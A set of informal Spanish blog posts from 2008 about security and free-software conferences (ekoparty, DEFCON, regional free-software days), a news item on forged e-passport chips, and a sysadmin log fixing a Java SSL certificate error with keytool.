P.S. We have also set the dates for CanSecWest 2010 for Mar. 22-26.
With the Olympics in the neighborhood a month before we have to
plan way ahead.
-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
Buenos Aires, Argentina   Sept. 30 / Oct. 1 - 2008    http://ba-con.com.ar
Tokyo, Japan  November 12/13 2008  http://pacsec.jp
Vancouver, Canada  March 16-20 2009  http://cansecwest.com
pgpkey http://dragos.com/ kyxpgp


 Y esto se replicó a varias listas, entre otras:

http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/63409

http://www.mail-archive.com/full-disclosure@lists.grok.org.uk/msg29765.html

http://www.networksecurityarchive.org/html/FullDisclosure/2008-06/msg01157.html

http://seclists.org/basics/2008/Aug/0202.html

 

---

Terminaron las jornadas regionales de software libre

Fue un evento de 3 días, miercoles 20, jueves 21 y viernes 22 de agosto, de 9 a 18 hs

Que lástima que no se hace jueves, viernes y sábado, así por lo menos podía haber ido todo un día entero
Hay mucho trabajo en mi trabajo ;-)
o sea que solo salí el viernes al mediodía, y porque tenía el taller de wikipedia

Viernes 22 Agosto
UB

Llegué, después de saludos a la organización, amigos de wikimedia
me quedé un rato en el stand
Me encontré con varios amigos, de la facu, de charlas, con Víctor (que nos trajo salmón de Chile), y que dio 2 charlas, Sistemas de Respaldos (Bacula) y Virtualizacion (XEN)
Mauro (del CIBSI), que vino de Córdoba con 3 chicos más, Desde google hasta las microempresas
Loreeee
El primer día hubo una charla ppal de wikipedia, que dio Pepe, Wikipedia: un delirio que funciona

16 hs
charla Sebas García y sus chicos del  grupo  de investigación de la uni
Detección de sesiones interactivas en SSH
La agarré empezada
Sesiones en su honeypot, que se lo ataquen, desde el 2006. Parecida a su charla del cibsi, pero otra parte de la experiencia.
si eran interactivas o no
Mostraron el gráfico de la experimentación, para determinar el umbral de decisión, si la sesión era interactiva o no
Contaron las veces que el proyecto casi cae, en realidad se frenó, por cosas inesperadas, tanto humanas, como técnicas..
algo raro que vieron, nunca lo habían visto, se acababan los sockets del sistema y empezaba a repetir lo nros, peor slas agregaba un guión, ya lo explicaré mejor....
pinit, libreria python fácil para abstraerse de bajo nivel
otra  pylibpcap (python module for libpcap)
y pcap
Muy buena la charla, porque como estaba presente Lu, se complementaba en varias partes
Como Luciano es debian maintainer de medusa
y se hablaba de hydra y medusa

17 hs
En el auditorio grande
Why Computers Are Getting Slower (And What We Can Do About It)
Rik van Riel se dedica a  Kernel Hacking y habló de cosas que se implementarán en el kernel. También habló de Redhat

En el hall, teníamos el stand de Wikimedia AR
y siempre me gusta, hablarle a la gente que se acerca, algunos a preguntar directamente, otros miran
 y yo me acerco a darles folletos, preguntarles, explicarles, acercarlos :-)
Las cosas que preguntaron
si se podía subir articulos a wikipedia
o corregir
claro ;-)
quien borra articulos
si hay gente que tiene más poder que otra
como se eligen los bibliotecarios

Después me invitaron a participar en un documental sobre software libre que será publicado con licencia CC, GFDL versión 2 me dijo el camarógrafo, que resultó ser un conocido....
Me dijeron "me queda poca cinta, decí lo que quieras sobre la wikipedia"
y hablé del proyecto colaborativo, proyectos que tenemos en la cabeza de wikimedia AR,
licencias de fotos, el wikiproyecto argentina, tartamudeé 2 veces, quería decir todo en el poco tiempo que tenía....
Bue, según el director de cine, dije cosas interesantes, relacionadas al software libre y que la gente no está enterada.....

A la salida, me paré en la puerta con los folletos de la eko

yo tenía la remera de la eko, así me preguntaban qué era, jajja
les explicaba, de los trainings, speakers, precios, packet wars, de todo un poco, según el interés y las preguntas de cada grupo.

vocera oficial, en un caso hablando de wikipedia y wikimedia
y en otros hablando de ekoparty, seguridad, forensia, desafíos de hacking.....

Adentro no podía repartir, asi que esperé que termine el evento y cuando salió la marea humana, yo estaba ahi, pero no pude darle a todos.....eran muchos...


Al ppio salían de a 2 , pocos, hasta que llegó Maddog
Me paré adelante y le hablé de la ekoparty, me escuchó, aunque no entendía nada.
Yo me hice que no lo conocía
que raro, yo probando a la gente ;-)
El traductor le explicó que dije, y me hizo una sonrisa muy tenue y amablemente me saludó como que no le interesaba.... Tonio...es un amargo??
Mirá como tomó mate..y sí, se disfrazó de astronauta
;-)
Gracias Beatrice por las fotos, no me olvidé de tu foto de commons, ya lo veo
Acá, hay más fotos, tomando mate con el casco puesto....tiene humor.....
y aparte en la charla cuando salió a escena, dijo ser Mark  Shuttleworth, en joda, porque no vino...


Se paró a hablar Pedro (CORE) y Ariel, su amigo fotógrafo, al estar con la remera de la eko....
los que conocían , preguntaban
Pedro dio esta charla, el jueves a la tarde, no pude ir, pero sería GRASP
Emparchando los inter-tubos: Haciendo de PHP un lenguaje ¿más? Seguro.
(Pedro O. Varangot)
Con faltas de ortografía uuuuuuuu


lu, me trajo algunos regalitos de la defcon, calcos, y la taza defcon
Gracias a los chicos de tuxinfo, por sacarnos la foto

Próximas jornadas regionales : Chile


A la noche Fiesta en Las cañitas, y a ver el partido de Argentina por la medalla de oro....

fiesta no
:-(
iba a ir......pero llegué a casa a descansar un poco y ....
sms....
hoy trabajo
acá estoy
:-(
:-)

Esto salió en el blog que tiene ZDNet

Habla de un resumen de la defcon, y pone links de los speakers, de algunos, no de todos
pero aparece alguno que conocemos y no figura en la lista de speakers

Es el 3º de la lista, un cráneo que gana varios retos hacking, muy ingenioso

Reto 1
www.kachakil.com/Retos/I64_Reto_1.pdf
Reto 2
www.kachakil.com/Retos/I64_Reto_2.pdf
http://elladodelmal.blogspot.com/2007/04/solucin-al-2o-reto-hacking-web-por.html
Reto 4
yoire.com/downloads/solucion_i64_rh4_dani.pdf
http://elladodelmal.blogspot.com/2008/02/solucionario-reto-hacking-vi-por-dani.html
Reto 8
http://elladodelmal.blogspot.com/2008/08/solucionario-reto-hacking-viii-ii-de-ii.html
de paso a ver si me sirve para arreglar mi disco rígido
Los tengo todos impresos, los leo en el bondi, a ver si aprendo algo.....

y resulta que K está ahí, en esa lista, porque trabajó en la herramienta Marathon Tool, que hablaba Chema.....
Ver en su blog.
ey chemax, por qué no poner un "Buscar" en tu blog? ya se ha hecho muy grande y hay mucha info.....

Bueno que no se enojen los demas cráneos como Romansoft, Palako, Mandingo, y otros que no recuerdo ahora
;-)


Guest editorial by Rob Fuller

DEFCON, the 9000+ attendee hacker conference in Vegas has become a sort of hydra conference. It has become more like a global fair than what most people think of conferences; even the badge is highly unique.

I say this because there are so many things to do at DEFCON, other than going to talks, that you could spend your whole weekend looking at the “World’s Largest Boar!”, so to speak. One of the CTF (Capture the Flag) contest winners this year actually exclaimed that he only made it to 2 talks in 12 years! I am also one of those individuals who barely get a chance to go to talks and now that the speaker pool is so diverse, it’s hard to find all of the “stuff” they release.

Before anyone has a chance to post “it’s all on the DEFCON CD dummy,” I want to challenge them to try. After a weekend of googling (which came back with few results) and making contact with some of the speakers, I provide you with a mostly accurate list of “stuff” that was released at DEFCON this year. If any of the information is inaccurate, or a tool is missing, please contact me and I will update this post.

Beholder – by Nelson Murilo and Luis Eduardo

Otras conferencias

http://security4all.blogspot.com/2008/08/some-interesting-information-on.html
http://www.sourceconference.com/blog/?p=42
http://www.rsaconference.com/
http://www.businesswire.com/portal/site/google/?ndmViewId=news_view&newsId=20080801005177&newsLang=en

todas gracias al twitter
http://twitter.com/ekoparty
http://twitter.com/alexaeko


Dan Kaminsky, la estrella de estos eventos en Las Vegas
y estuvo tanto para la seriedad como para la joda
http://flickr.com/photos/fakedankaminsky/page4/
vean estas fotos, había un cartón de él, para que te saques fotos, pero ya se lo tomaron para la joda...
obvio, no?
muy divertido

                                    foto verdadera con kaminsky verdadero



















Más fotos de lu, albumes

http://www.lucianobello.com.ar/fotos/?galerie=BlackHat%20-%20Las%20Vegas,%20USA
bh

http://www.lucianobello.com.ar/fotos/?galerie=Defcon16%20-%20Las%20Vegas,%20USA
defcon


Más fotos de defcon












chemita preparandose para su expo....
mmm
quizá no venga a la eko, aún no se decide
justo el 3 de octubre hay una presentación de ms, en España el MVP Open Day

Próximo destino, Viena en noviembre, la DeepSec

eyy, eso en Europa, acá viene la eko, antes http://www.ekoparty.com.ar/

Otras fotos que me mandaron, amigos que fueron a defcon













pandas with gambas del twitter de Dave Aitel (IMMUNITY), que a propósito viene a la eko

La competencia, como iba rankeando

http://sexy.pandas.es/blog/

y hablando de sexys......espectáculo entre los stands......ojo, esto es antes de la fiesta defcon ;-)
asi que....
como habrá sido la fiesta


http://flickr.com/photos/stits/page9/

http://flickr.com/photos/stits/page10/  

Propagandas indirectas
;-)

En la defcon
en la charla de Dan Kaminsky
cuando habló de la vulnerabilidad de dns nombró evilgrade, gritó por esta herramienta....
más prensa de Fran

y había uno con la remera de la eko

y ahi aparece ekoparty!!

eko Noticia: está abierta la registración
y la lista de trainings
y la lista de speakers (1º ronda), faltan confirmar más
visitar la página.......
http://www.ekoparty.com.ar

Se falsifican en minutos.

Una investigación del diario The Times, de Londres, reveló que los nuevos pasaportes electrónicos, en teoría inviolables, pueden falsificarse en cuestión de minutos.
Y la mejora, si es una mejora es para proteger contra el terrorismo y el crimen organizado.

La falsificación es posible, según las pruebas realizadas por el periódico, por una serie de fallas en los microchips que tienen esos documentos. Así, se desmintió al Gobierno británico, que minimizó el robo de 3.000 pasaportes en blanco, ocurrido la semana pasada, argumentando que los falsificadores nada podrían hacer con esas visas de viaje.

Para la investigación, The Times contrató a un experto holandés que en menos de una hora, y utlizando tecnología accesible y barata, falsificó los microchips de dos pasaportes británicos e implantó en ellos imágenes digitales de Osama bin Laden, líder de Al Qaeda, y de un terrorista suicida. El software de control no se percató de la adulteración de los documentos, que pertenecían a un recién nacido y a una mujer de 36 años. Y dejó en ridículo al Gobierno británico, que sostiene con firmeza que una falsificación de este tipo sería detectada en lo inmediato por los controles de frontera y en las aduanas.

Los nuevos pasaportes electrónicos, que se expiden en casi 45 países, cuentan con la tecnología RFID (identificación por radiofrecuencia), que data de la 2° Guerra Mundial y servía para identificar a aviones enemigos a la distancia.

Sacado de Clarin y de barrapunto

Cerca
ya
ahora!!

Error en la aplicacion
Esto me tiraba el mail del cron

Subject: Cron <dragon@alexa-web> /var/tomcat4/webapps/journal-appsusc/WEB-INF/classes/scripts/tosap.sh 2>&1
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/home/dragon>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=dragon>

log4j:ERROR setFile(null,true) call failed.
java.io.FileNotFoundException: /var/tomcat4/logs/ToSap.log (Permission denied)
    at java.io.FileOutputStream.openAppend(Native Method)
    at java.io.FileOutputStream.<init>(FileOutputStream.java:177)
    at java.io.FileOutputStream.<init>(FileOutputStream.java:102)
    at org.apache.log4j.FileAppender.setFile(FileAppender.java:272)
    at org.apache.log4j.RollingFileAppender.setFile(RollingFileAppender.java:156)
    at org.apache.log4j.FileAppender.activateOptions(FileAppender.java:151)
    at org.apache.log4j.config.PropertySetter.activate(PropertySetter.java:247)
    at org.apache.log4j.config.PropertySetter.setProperties(PropertySetter.java:123)
    at org.apache.log4j.config.PropertySetter.setProperties(PropertySetter.java:87)
    at org.apache.log4j.PropertyConfigurator.parseAppender(PropertyConfigurator.java:645)
    at org.apache.log4j.PropertyConfigurator.parseCategory(PropertyConfigurator.java:603)
    at org.apache.log4j.PropertyConfigurator.configureRootCategory(PropertyConfigurator.java:500)
    at org.apache.log4j.PropertyConfigurator.doConfigure(PropertyConfigurator.java:406)
    at org.apache.log4j.PropertyConfigurator.configure(PropertyConfigurator.java:340)
    at ar.com.journal.interfaces.sap.ToSAPRunner.main(ToSAPRunner.java:40)
javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: No trusted certificate found

Probamos varias cosas, pensando que el error era otra cosa de la aplicación, y  no el certificado
hasta que no quedaron dudas, en otras aplicaciones había pasado lo mismo 1 semana atrás y se arregló bajando de nuevo el certificado del proveedor.
y la fecha coincidía con el bug de opensSSL
y las CA que revocaron todos los certificados que venían de servidores linux y los volvieron crear tonces....
por ejemplo lo que hablamos en la charla de certisur.....

maso, cuando dejó de funcionar, hace 2 semanas, coincidía con este escenario

Solución

Bajar certificado del proveedor (que tiene fecha de creación, 10 de julio de 2007), y volverlo a instalar.

En este directorio, donde están las cosas de seguridad de la biblioteca
/usr/java/j2sdk1.4.2/jre/lib/security

usar la herramienta keytool de java

[root@alexa-web security]# keytool -import -keystore cacerts
-file /home/dragon/nps.cer -alias nps
Escriba la contrase�a del almac�n de claves:  changeit
error de keytool: java.lang.Exception: La entrada no es un certificado
X.509
[root@alexa-web security]#

este no anduvo, el certificado que me mandó el desarrollador

probé con el mío
el que bajé yo
y no me tiró error

[root@alexa-web security]# keytool -import -keystore cacerts
-file /home/dragon/certNps.cer -alias nps
Escriba la contrase�a del almac�n de claves:  changeit
Propietario: CN=services.nps.com.ar, OU="Member, VeriSign Trust
Network", OU=Authenticated by CertiSur S.A., OU=Terms of use at
www.certisur.com/rpa (c) 04, OU="services.nps,com.ar", O=SUB1 S.A.,
L=Capital Federal, ST=Buenos Aires, C=AR
Emisor: CN=VeriSign Class 3 Secure Server CA, OU=Terms of use at
https://www.verisign.com/rpa (c)05, OU=VeriSign Trust Network,
O="VeriSign, Inc.", C=US
N�mero de serie: --a---4-----d--0--5---f----f---0
V�lido desde: Thu Jul 10 21:00:00 ART 2008 hasta: Mon Jul 27 20:59:59
ART 2009
Huellas digitales del certificado:
 MD5:  --:--:--:--:--:--:--:7-:--:--:--:--:--:--:--:--
 SHA1: --:--:--:--:--:--:--:--:--:--:--:--:--:--:--:--:E-:--:--:--
�Confiar en este certificado? [no]:  si
Se ha a�adido el certificado al almac�n de claves
[root@alexa-web security]#